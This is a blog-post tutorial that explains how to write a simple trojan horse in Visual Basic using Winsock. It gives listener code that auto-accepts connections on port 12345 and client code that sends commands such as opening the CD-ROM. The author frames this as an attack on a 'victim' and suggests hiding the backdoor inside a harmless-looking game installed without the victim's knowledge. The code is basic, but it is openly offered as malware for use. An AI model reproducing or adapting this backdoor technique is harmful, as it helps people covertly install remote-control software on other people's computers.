Tuesday, March 13, 2018
SimPle Trojan
SimPle Trojan
This Topic is going to explain all you guys who are curious enough(, which you should be, if you are here:),) to want to know how sub7 or BO or any other trojan horse basically works.This tutorial will explain you the basics of a Trojan Horse application.
OK here we go, first of you need someone to attak, and someone to be attaked, l4m3r is going to attak StupidGuy ok?
Now there are 2 programs one thats called server which is installed (usually without the victim having knowledge of it, or its secondary effect) on StupidGuys computer, and the client program which l4m3r has.
Now the concept is very simple, l4m3r connects to StupidGuys computer and sends whatever he wants the victims computer to do.like move mouse, or open cd rom, or anything.
now into code:
on l4m3r computer
add a winsock control and establish connection
winsock1.connect "127.0.0.1",12345 IP, port
this will tell ur computer to try to connect to computer 127.0.0.1 on port 12345
btw there are only 65535 ports so try not using any higher number or any already used port
on StupidGuy computer
Private Sub Form_Load()
Winsock1.LocalPort = 12345
Winsock1.Listen
End Sub
this will tell your victims computer to standby for a connection from that port (12345) whever the program loads. Dont misunderstand me, both programs have to be written before you send the StupidGuy program to its victim.
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept requestID
end sub
this part auto accepts any incoming request for connection
so now both PCs are connected
all you have to do, is send some data which u earlier already programmed both computers to understand, like:
on l4m3r computer:
Private Sub Command1_Click()
Winsock1.SendData "OPEN"
End Sub
now the attaker sends the OPEN word to the victims pc thrue the connection opened on port 12345 (remember?)
on StupidGuy computer:
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim S As String
Call Winsock1.GetData(S, vbString)
If S = "OPEN" Then opencdrom
of course there is a specific api which opens cdroms but this is not part of our course today
so now StupidGuys computer recieved the word "OPEN" and the program automatically opens the cdrom when the word arrives within the connection it has opened.
so that trojan horse can be actually a very cool little dart game or something, and have a secondary effect, like a side effect... a back door;)
hope you enjoyed the thought, check u later, and mail me if u have any questions on bluespy_PJ@hotmail.com
ba bye
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.